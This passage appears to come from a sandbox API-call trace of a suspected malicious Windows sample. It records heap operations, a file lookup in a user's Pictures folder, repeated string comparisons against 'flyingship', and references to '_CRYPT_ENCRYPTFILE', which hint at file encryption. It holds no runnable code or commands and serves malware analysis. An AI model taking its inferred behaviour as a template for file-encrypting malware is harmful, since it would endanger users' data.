wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.176] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0xa1f44280, ftLastWriteTime.dwHighDateTime=0x1d5e558, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 0x90add8 [0190.176] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.177] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uPfzg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90add8 [0190.181] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.181] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.182] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0190.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1aa0 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.182] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.183] RtlAllocateHeap 